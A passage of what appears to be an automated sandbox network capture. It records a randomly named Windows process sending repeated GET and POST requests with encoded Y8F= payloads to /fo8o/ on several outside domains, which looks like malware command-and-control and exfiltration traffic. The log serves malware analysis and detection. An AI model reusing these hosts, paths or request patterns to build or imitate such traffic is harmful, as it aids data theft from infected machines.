FygV02iAEx8s/ZD01jKVKesA0Wv8lObFdlA1utCJQSEcps [TRUNCATED]
Jun 26, 2024 14:57:14.933590889 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:57:14 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	65242	195.110.124.133	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:16.716113091 CEST	524	OUT	GET /fo8o/?Y8F=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:57:17.424397945 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:57:17 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	65243	23.227.38.74	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:23.132333040 CEST	793	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 34 34 74 2f 30 69 59 70 38 78 35 63 76 4b 4a 57 46 30 43 50 49 30 69 62 70 51 37 52 77 5a 71 76 6a 43 56 79 79 6b 3d Data Ascii: Y8F=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDp44t/0iYp8x5cvKJWF0CPI0ibpQ7RwZqvjCVyyk=
Jun 26, 2024 14:57:23.652044058 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:57:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 Vary: Accept-Encoding x-frame-options: DENY x-shopid: 87850025272 x-shardid: 311 x-request-id: 268b4957-484f-4308-9451-c94c16a9f066-1719406643 server-timing: processing;dur=12 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=268b4957-484f-4308-9451-c94c16a9f066-1719406643 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=268b4957-484f-4308-9451-c94c16a9f066-1719406643 x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tc9%2Bydu0rOS1FuP2JaCcWSisUCFq%2F7bDdoA%2Bxyhq Data Raw: Data Ascii:
Jun 26, 2024 14:57:23.652072906 CEST	1236	IN	Data Raw: 32 46 30 59 64 48 42 43 34 25 32 42 61 52 66 34 36 4e 68 72 25 32 46 6a 53 61 4f 69 4c 4a 44 33 75 58 61 68 35 4c 33 48 64 72 48 35 6c 6c 49 46 65 74 65 58 4f 76 58 49 61 30 45 25 32 46 69 78 66 33 58 61 48 71 72 55 46 78 48 77 45 42 4f 44 25 32 Data Ascii: 2F0YdHBC4%2BaRf46Nhr%2FjSaOiLJD3uXah5L3HdrH5llIFeteXOvXIa0E%2Fixf3XaHqrUFxHwEBOD%2BY9sOM1yE6%2Fk0cb0QKjAWIh3Iyu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfReque
Jun 26, 2024 14:57:23.652091026 CEST	848	IN	Data Raw: 67 90 44 1e 07 0f 1e 72 2e e0 f1 d7 9b 8a d7 d4 83 f0 99 c7 ba ac d9 09 8d d4 63 90 f4 d4 00 73 c3 ec 66 04 6b bc b9 7a 37 d6 c8 44 72 83 48 e1 37 a3 01 2a 66 d5 ab 90 c3 3f 4f 85 5d 7d 26 a1 5a 2e 88 81 5c dd 9e 18 3d 7f cb 9f 36 4e 08 8f 57 12 Data Ascii: gDr.csfkz7DrH7*f?O]}&Z.\=6NW":FAO)"> 0PbIx0<txj[#`C!0TA!5]~Jp8?=AS;jwjc0uA[S/J+7pyG!0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	65244	23.227.38.74	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:25.670231104 CEST	813	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 59 61 4c 36 59 4d 41 41 34 44 31 41 53 6c 73 6c 78 6f 68 32 6d 4f 6f 43 59 2f 53 38 55 4b 38 57 70 74 39 58 55 4f Data Ascii: Y8F=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoYaL6YMAA4D1ASlslxoh2mOoCY/S8UK8Wpt9XUO
Jun 26, 2024 14:57:26.197143078 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:57:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 Vary: Accept-Encoding x-frame-options: DENY x-shopid: 87850025272 x-shardid: 311 x-request-id: ceed7697-d96e-455a-9785-3ec3a95179f2-1719406646 server-timing: processing;dur=13 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=ceed7697-d96e-455a-9785-3ec3a95179f2-1719406646 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=ceed7697-d96e-455a-9785-3ec3a95179f2-1719406646 x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cXwxYIiSd83oXYvs9IiCI%2Bo%2FZm1phGo52q6UrmG%2B Data Raw: Data Ascii:
Jun 26, 2024 14:57:26.197160006 CEST	1236	IN	Data Raw: 37 6f 4d 4c 6a 73 43 33 6b 47 56 78 53 32 50 46 77 44 68 4f 57 53 32 55 44 6b 73 6c 67 4e 30 68 45 64 35 70 48 6e 37 39 38 48 68 52 72 73 6c 68 39 4a 65 42 6d 75 76 76 4b 25 32 42 4c 70 64 37 37 69 6e 4e 25 32 46 55 32 54 44 4d 4a 36 25 32 42 33 Data Ascii: 7oMLjsC3kGVxS2PFwDhOWS2UDkslgN0hEd5pHn798HhRrslh9JeBmuvvK%2BLpd77inN%2FU2TDMJ6%2B3P30Y8DhYij7nXOcChkqD7sx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDura
Jun 26, 2024 14:57:26.197170019 CEST	842	IN	Data Raw: 1e 72 2e e0 f1 d7 9b 8a d7 d4 83 f0 99 c7 ba ac d9 09 8d d4 63 90 f4 d4 00 73 c3 ec 66 04 6b bc b9 7a 37 d6 c8 44 72 83 48 e1 37 a3 01 2a 66 d5 ab 90 c3 3f 4f 85 5d 7d 26 a1 5a 2e 88 81 5c dd 9e 18 3d 7f cb 9f 36 4e 08 8f 57 12 22 9c 3a 08 46 93 Data Ascii: r.csfkz7DrH7*f?O]}&Z.\=6NW":FAO)"> 0PbIx0<txj[#`C!0TA!5]~Jp8?=AS;jwjc0uA[S/J+7pyG!0&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	65245	23.227.38.74	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:28.212186098 CEST	1830	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 52 51 43 66 4b 4b 50 46 55 58 50 4c 49 32 5a 5a 45 2b 55 32 30 57 38 6a 75 67 70 6e 4d 50 39 58 36 6d 39 48 45 54 47 4d 4e 75 6f 68 35 5a 2f 57 55 66 58 41 63 4b 64 48 72 6a 47 36 33 38 2b 63 65 2b 4b 6f 46 79 78 6f 47 72 72 36 67 54 4f 31 47 48 68 32 74 6b 6a 56 71 30 44 51 30 59 68 65 75 55 33 4e 34 6e 61 6d 53 70 6c 57 77 6e 5a 76 4d 53 6e 48 54 37 45 64 4c 75 7a 65 4d 44 4b 42 42 59 4f 4b 35 34 43 65 72 78 39 37 49 4e 4c 76 59 37 37 52 4d 50 6b 4d 38 61 34 4e 71 49 66 4a 2b 4c 55 62 [TRUNCATED] Data Ascii: Y8F=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/RQCfKKPFUXPLI2ZZE+U20W8jugpnMP9X6m9HETGMNuoh5Z/WUfXAcKdHrjG638+ce+KoFyxoGrr6gTO1GHh2tkjVq0DQ0YheuU3N4namSplWwnZvMSnHT7EdLuzeMDKBBYOK54Cerx97INLvY77RMPkM8a4NqIfJ+LUbPdan5y6nmVg2T15O46SSiICnn9sPdrClkySxPg90+66sxn7el0a2jZuvi1pdjOQsqgIiWprkBJwREZj9hL2yBcBpRWRydR14xzv7WGDjbI/BG5vyJrCevX6+5B/r1EYjdsjOp+DPmOdk1YHdHRiVrQJRz43O2ru70ZxurKEMAkdIwIwY/wipZn+x/WE+oGtNpI+PENQWD9+o+Tv422RkpALbLVz2rQVbkIBPfsmHCo0vbVxU38E5v/188XyuXWegYIOzg/1m2mB1QAiQ0UKmouQzf79YuQy/JT37MliyksBgv+ao6V+bh03jKOutTplRUwD+JXIlvr3VWfI8CbVDz4N4whfoYSDHlF3ZiL7LN/P78Uy72WZt7t0Q45nP3sE3XAblReYqZy80M+E89s5h09Sl3cbkEHlKJ1866ix+VVgvs7FesNAHcZm6iFT52yD3Bca/vLERMQYPzqWAXle4wU5duR95zvNMrAbIcpcWNmdLR8ucKUcq2br9ennNglIj+TlbiyDGivqRcMFKqgN3SnLf4NFR86eJ9OXc+gowuLwrOVqZhtcNIFomx1ssWqnD6b4Jy3mJDja9Dh+w+wj2+X9kZCFIJPrluC1CLLrJEZXCeNu9R3RKAEuHGRASBRHv/WbGQRInaDoB4eS6MBQalBJVnN/WwIZu+q [TRUNCATED]
Jun 26, 2024 14:57:28.756469965 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:57:28 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 Vary: Accept-Encoding x-frame-options: DENY x-shopid: 87850025272 x-shardid: 311 x-request-id: 02a1af3c-bc37-427d-954c-e20427df7b3a-1719406648 server-timing: processing;dur=12 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=02a1af3c-bc37-427d-954c-e20427df7b3a-1719406648 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=02a1af3c-bc37-427d-954c-e20427df7b3a-1719406648 x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=83QUDHEFPXtzBNxILLER3etN60AZbpEWI5%2BOyYpQlWNv Data Raw: Data Ascii:
Jun 26, 2024 14:57:28.756495953 CEST	1236	IN	Data Raw: 68 43 6c 66 70 75 52 7a 38 4c 73 4e 54 6c 6c 31 4d 44 4b 78 4c 31 6c 67 64 54 44 74 32 55 67 4e 63 42 25 32 42 75 38 64 77 63 31 30 42 77 5a 6f 49 61 5a 7a 31 76 4c 50 59 72 7a 73 6e 4f 7a 73 78 4f 46 67 53 34 49 65 71 77 6f 56 35 4a 73 4e 43 6e Data Ascii: hClfpuRz8LsNTll1MDKxL1lgdTDt2UgNcB%2Bu8dwc10BwZoIaZz1vLPYrzsnOzsxOFgS4IeqwoV5JsNCngoIb580QuiUT5hc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur
Jun 26, 2024 14:57:28.756506920 CEST	829	IN	Data Raw: 67 1e eb bc 64 07 d4 53 f7 41 d2 53 03 cc 0d a3 9b 1e ac fe e6 ec 5d 5f 23 03 c9 05 22 85 df 88 06 a8 98 55 af 42 0e ff 3c 15 76 f5 99 84 6a 39 21 06 72 75 7b 60 f4 f8 2d 7f 58 39 21 3c 5e 49 88 f0 dc 41 30 9a 74 d0 e0 57 4e e4 47 0e 7a d8 d5 0d Data Ascii: gdSAS]_#"UB<vj9!ru{`-X9!<^IA0tWNGz_IfAp<#qkHsr%,WtHUaHB*WGIaxjxC5AVR=F%0hk23}SRiN8D:Hl6\`SKx.+/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	65246	23.227.38.74	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:30.750226021 CEST	522	OUT	GET /fo8o/?Y8F=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDTGgZiIm8sV5rhtCXud2beKoow48CYPqOXsFqBfVEoJ79g==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.donnavariedades.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:57:31.292165041 CEST	1236	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 26 Jun 2024 12:57:31 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 X-Storefront-Renderer-Rendered: 1 location: https://donnavariedades.com/fo8o?Y8F=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDTGgZiIm8sV5rhtCXud2beKoow48CYPqOXsFqBfVEoJ79g==&9brL_=BThPe0S0 x-redirect-reason: https_required x-frame-options: DENY content-security-policy: frame-ancestors 'none'; x-shopid: 87850025272 x-shardid: 311 vary: Accept powered-by: Shopify server-timing: processing;dur=11;desc="gc:1", db;dur=3, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="fsgd", requestID;desc="2bf8cd4b-b816-4e52-9099-6e7e450b0afe-1719406651" x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1 x-request-id: 2bf8cd4b-b816-4e52-9099-6e7e450b0afe-1719406651 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eiq9WWnUsBXlVjrD6saUiJXqngLjuxLZk%2BahrCXK8brp9BN4n%2BQDv07momDGNwnAP4eBnHlfz46rmelsws6b%2B6lxzXg9Rbq9b4yrotjZlE5bVVPzhmgrxFYztP%2BSLoThWNjc5ugddb0h"}],"group":"cf-nel","max_ Data Raw: Data Ascii:
Jun 26, 2024 14:57:31.292558908 CEST	353	IN	Data Raw: 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d Data Ascii: ge":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=65.000057X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Dow

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	65247	34.120.249.181	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:37.322074890 CEST	769	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6b 38 49 71 59 6a 43 7a 72 6b 6e 71 78 6c 42 78 35 70 5a 6a 48 37 48 51 6f 33 33 56 6e 4e 4a 72 64 76 4c 2b 69 6b 6b 4f 71 77 75 78 48 64 32 43 33 33 31 45 37 55 6c 43 70 79 65 5a 55 37 2f 37 62 31 55 47 42 61 6e 55 50 36 50 66 52 70 71 53 54 70 39 69 47 4a 68 2f 4a 45 41 4f 6f 74 78 50 51 53 71 30 43 62 44 6e 33 4c 32 45 2b 63 6f 35 56 39 67 76 6f 71 6b 79 49 6e 54 43 69 35 73 55 55 30 64 55 73 32 39 38 48 55 79 30 33 4e 46 66 35 44 6f 4e 56 55 32 74 4c 50 72 51 58 79 49 2f 6f 68 46 34 2b 6a 45 43 6c 6c 71 7a 43 7a 78 52 43 58 7a 2b 34 55 78 6b 33 58 41 3d Data Ascii: Y8F=gB7R/rxgLjsQk8IqYjCzrknqxlBx5pZjH7HQo33VnNJrdvL+ikkOqwuxHd2C331E7UlCpyeZU7/7b1UGBanUP6PfRpqSTp9iGJh/JEAOotxPQSq0CbDn3L2E+co5V9gvoqkyInTCi5sUU0dUs298HUy03NFf5DoNVU2tLPrQXyI/ohF4+jECllqzCzxRCXz+4Uxk3XA=
Jun 26, 2024 14:57:37.961982012 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Wed, 26 Jun 2024 12:57:37 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close
Jun 26, 2024 14:57:37.965033054 CEST	559	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.5	65248	34.120.249.181	80

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:39.856323004 CEST	789	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 74 72 64 50 62 2b 6a 6e 38 4f 70 77 75 78 49 39 32 62 6f 48 31 4e 37 55 70 4b 70 79 79 5a 55 37 62 37 62 77 77 47 42 70 2f 54 4a 36 50 64 64 